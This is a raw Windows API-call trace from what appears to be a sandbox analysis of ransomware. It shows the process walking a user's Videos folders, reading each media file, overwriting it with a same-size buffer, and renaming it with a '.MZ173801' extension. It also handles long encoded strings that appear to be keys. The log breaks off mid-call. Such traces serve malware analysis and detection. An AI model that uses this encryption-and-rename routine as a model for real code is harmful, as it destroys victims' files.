[0120.462] WriteFile (in: hFile=0x408, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0x1055a, lpNumberOfBytesWritten=0x19f424, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f424*=0x1055a, lpOverlapped=0x0) returned 1 [0120.464] CloseHandle (hObject=0x408) returned 1 [0120.467] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\ZrVO9ZIsn.flv" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\zrvo9zisn.flv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\ZrVO9ZIsn.flv.MZ173801" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\zrvo9zisn.flv.mz173801")) returned 1 [0120.600] GetCurrentThreadId () returned 0x1358 [0120.600] GetCurrentThreadId () returned 0x1358 [0120.600] GetCurrentThreadId () returned 0x1358 [0120.600] GetCurrentThreadId () returned 0x1358 [0120.600] GetCurrentThreadId () returned 0x1358 [0120.600] GetCurrentThreadId () returned 0x1358 [0120.600] FindNextFileW (in: hFindFile=0xa1bb98, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd51a28f0, ftCreationTime.dwHighDateTime=0x1d5e2bf, ftLastAccessTime.dwLowDateTime=0x32ae0f20, ftLastAccessTime.dwHighDateTime=0x1d5eaf6, ftLastWriteTime.dwLowDateTime=0x32ae0f20, ftLastWriteTime.dwHighDateTime=0x1d5eaf6, nFileSizeHigh=0x0, nFileSizeLow=0x1055a, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="ZrVO9ZIsn.flv", cAlternateFileName="ZRVO9Z~1.FLV")) returned 0 [0120.600] GetLastError () returned 0x12 [0120.600] FindClose (in: hFindFile=0xa1bb98 | out: hFindFile=0xa1bb98) returned 1 [0120.600] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\*.*", lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7819bab0, ftCreationTime.dwHighDateTime=0x1d5eb54, ftLastAccessTime.dwLowDateTime=0xa928a0ec, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa928a0ec, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName=".", cAlternateFileName="")) returned 0xa1bcb0 [0120.600] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c8 | out: lpLocalFileTime=0x19f4c8) returned 1 [0120.601] FileTimeToDosDateTime (in: lpFileTime=0x19f4c8, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0120.601] FindNextFileW (in: hFindFile=0xa1bcb0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7819bab0, ftCreationTime.dwHighDateTime=0x1d5eb54, ftLastAccessTime.dwLowDateTime=0xa928a0ec, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa928a0ec, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="..", cAlternateFileName="")) returned 1 [0120.601] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0120.601] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0120.601] FindNextFileW (in: hFindFile=0xa1bcb0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b1dc650, ftCreationTime.dwHighDateTime=0x1d5e417, ftLastAccessTime.dwLowDateTime=0xfef1fea0, ftLastAccessTime.dwHighDateTime=0x1d5e5f8, ftLastWriteTime.dwLowDateTime=0xa907d55f, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x1257c, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="f_4h9eckCbvZmLv.mp4.MZ173801", cAlternateFileName="F_4H9E~1.MZ1")) returned 1 [0120.601] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0120.601] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0120.601] FindNextFileW (in: hFindFile=0xa1bcb0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6a9e1b0, ftCreationTime.dwHighDateTime=0x1d5ea42, ftLastAccessTime.dwLowDateTime=0xd486a390, ftLastAccessTime.dwHighDateTime=0x1d5e414, ftLastWriteTime.dwLowDateTime=0xa90dec04, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x15a5c, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="ky0-S969NuCh.mkv.MZ173801", cAlternateFileName="KY0-S9~1.MZ1")) returned 1 [0120.601] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0120.601] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0120.601] FindNextFileW (in: hFindFile=0xa1bcb0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe051a170, ftCreationTime.dwHighDateTime=0x1d5ee78, ftLastAccessTime.dwLowDateTime=0xc939d6a0, ftLastAccessTime.dwHighDateTime=0x1d5e2d5, ftLastWriteTime.dwLowDateTime=0xc939d6a0, ftLastWriteTime.dwHighDateTime=0x1d5e2d5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="v4vV8", cAlternateFileName="")) returned 1 [0120.601] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0120.601] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0120.601] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\v4vV8\\*.*", lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe051a170, ftCreationTime.dwHighDateTime=0x1d5ee78, ftLastAccessTime.dwLowDateTime=0xc939d6a0, ftLastAccessTime.dwHighDateTime=0x1d5e2d5, ftLastWriteTime.dwLowDateTime=0xc939d6a0, ftLastWriteTime.dwHighDateTime=0x1d5e2d5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName=".", cAlternateFileName="")) returned 0xa1bd58 [0120.601] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe051a170, ftCreationTime.dwHighDateTime=0x1d5ee78, ftLastAccessTime.dwLowDateTime=0xc939d6a0, ftLastAccessTime.dwHighDateTime=0x1d5e2d5, ftLastWriteTime.dwLowDateTime=0xc939d6a0, ftLastWriteTime.dwHighDateTime=0x1d5e2d5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="..", cAlternateFileName="")) returned 1 [0120.601] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a79310, ftCreationTime.dwHighDateTime=0x1d5e42d, ftLastAccessTime.dwLowDateTime=0x792f6dc0, ftLastAccessTime.dwHighDateTime=0x1d5e530, ftLastWriteTime.dwLowDateTime=0x792f6dc0, ftLastWriteTime.dwHighDateTime=0x1d5e530, nFileSizeHigh=0x0, nFileSizeLow=0x18354, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="6E4Yux.mp4", cAlternateFileName="")) returned 1 [0120.601] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1fc | out: lpLocalFileTime=0x19f1fc) returned 1 [0120.601] FileTimeToDosDateTime (in: lpFileTime=0x19f1fc, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0120.601] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\v4vV8\\6E4Yux.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\v4vv8\\6e4yux.mp4"), fInfoLevelId=0x0, lpFileInformation=0x19f18c | out: lpFileInformation=0x19f18c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a79310, ftCreationTime.dwHighDateTime=0x1d5e42d, ftLastAccessTime.dwLowDateTime=0x792f6dc0, ftLastAccessTime.dwHighDateTime=0x1d5e530, ftLastWriteTime.dwLowDateTime=0x792f6dc0, ftLastWriteTime.dwHighDateTime=0x1d5e530, nFileSizeHigh=0x0, nFileSizeLow=0x18354)) returned 1 [0120.602] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0120.602] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242e95c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0120.603] GetCurrentThreadId () returned 0x1358 [0120.603] GetCurrentThreadId () returned 0x1358 [0120.603] GetCurrentThreadId () returned 0x1358 [0120.603] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0120.603] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242eccc, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0120.604] GetCurrentThreadId () returned 0x1358 [0120.604] GetCurrentThreadId () returned 0x1358 [0120.604] GetCurrentThreadId () returned 0x1358 [0120.604] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\v4vV8\\6E4Yux.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\v4vv8\\6e4yux.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x40c [0120.604] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f140*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f140*=0) returned 0x0 [0120.605] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0x0 [0120.605] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0x18354 [0120.605] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0x0 [0120.605] ReadFile (in: hFile=0x40c, lpBuffer=0x23a47a0, nNumberOfBytesToRead=0x18354, lpNumberOfBytesRead=0x19f14c, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesRead=0x19f14c*=0x18354, lpOverlapped=0x0) returned 1 [0120.606] CloseHandle (hObject=0x40c) returned 1 [0120.610] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\v4vV8\\6E4Yux.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\v4vv8\\6e4yux.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x40c [0120.612] WriteFile (in: hFile=0x40c, lpBuffer=0x23be7d0*, nNumberOfBytesToWrite=0x18354, lpNumberOfBytesWritten=0x19f158, lpOverlapped=0x0 | out: lpBuffer=0x23be7d0*, lpNumberOfBytesWritten=0x19f158*=0x18354, lpOverlapped=0x0) returned 1 [0120.614] CloseHandle (hObject=0x40c) returned 1 [0120.618] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\v4vV8\\6E4Yux.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\v4vv8\\6e4yux.mp4"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\v4vV8\\6E4Yux.mp4.MZ173801" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\v4vv8\\6e4yux.mp4.mz173801")) returned 1 [0120.620] GetCurrentThreadId () returned 0x1358 [0120.620] GetCurrentThreadId () returned 0x1358 [0120.620] GetCurrentThreadId () returned 0x1358 [0120.620] GetCurrentThreadId () returned 0x1358 [0120.620] GetCurrentThreadId () returned 0x1358 [0120.620] GetCurrentThreadId () returned 0x1358 [0120.620] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf56d550, ftCreationTime.dwHighDateTime=0x1d5f070, ftLastAccessTime.dwLowDateTime=0x1112240, ftLastAccessTime.dwHighDateTime=0x1d5e2d1, ftLastWriteTime.dwLowDateTime=0x1112240, ftLastWriteTime.dwHighDateTime=0x1d5e2d1, nFileSizeHigh=0x0, nFileSizeLow=0x171df, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="9_dIdXhT.mp4", cAlternateFileName="")) returned 1 [0120.620] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1f8 | out: lpLocalFileTime=0x19f1f8) returned 1 [0120.620] FileTimeToDosDateTime (in: lpFileTime=0x19f1f8, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0120.620] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\v4vV8\\9_dIdXhT.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\v4vv8\\9_didxht.mp4"), fInfoLevelId=0x0, lpFileInformation=0x19f18c | out: lpFileInformation=0x19f18c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf56d550, ftCreationTime.dwHighDateTime=0x1d5f070, ftLastAccessTime.dwLowDateTime=0x1112240, ftLastAccessTime.dwHighDateTime=0x1d5e2d1, ftLastWriteTime.dwLowDateTime=0x1112240, ftLastWriteTime.dwHighDateTime=0x1d5e2d1, nFileSizeHigh=0x0, nFileSizeLow=0x171df)) returned 1 [0120.621] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0120.621] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 